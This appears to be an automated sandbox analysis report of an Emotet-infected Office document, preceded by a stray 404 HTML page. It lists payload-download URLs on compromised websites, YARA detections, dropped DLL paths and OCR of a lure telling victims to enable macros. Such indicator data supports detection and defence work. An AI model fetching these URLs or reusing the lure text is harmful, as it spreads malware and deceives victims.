<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: http://calledtochange.org
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: http://calledtochange.org/CalledtoChange/8huSOd/
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000002.2111878141.000000001B64C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1814.crl0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000003.2092182578.000000001D0FC000.00000004.00000001.sdmpString found in binary or memory: http://crl.use
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2102387342.0000000000274000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: powershell.exe, 00000005.00000003.2101935876.000000001D06A000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2111811084.000000001B582000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0%
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.o
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: http://riandutra.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: http://riandutra.com/email/AfhE8z0/
                      Source: powershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2112621761.000000001D2F0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2125133029.0000000002820000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.com/cgi-bin/Qg/
                      Source: powershell.exe, 00000005.00000002.2111189798.0000000003C06000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.comh
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://mrveggy.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://mrveggy.com/wp-admin/n/
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmpString found in binary or memory: https://norailya.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://norailya.com/drupal/retAl/
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://ummahstars.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/P
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2180397123.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197905867.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2168489304.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2188156936.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336963149.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2198949244.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2210754308.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2133960367.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2208025145.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134645958.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157336224.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113528268.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113590423.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134026009.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2177327005.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148272205.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197927518.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157365734.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124067211.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2208036737.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2159945715.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2170332868.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2177340948.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2217846238.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2149995465.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2188168029.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2168457347.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 4,072 N@m 13 ;a 1009
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5777
                      Source: unknownProcess created: Commandline size = 5676
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5676
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
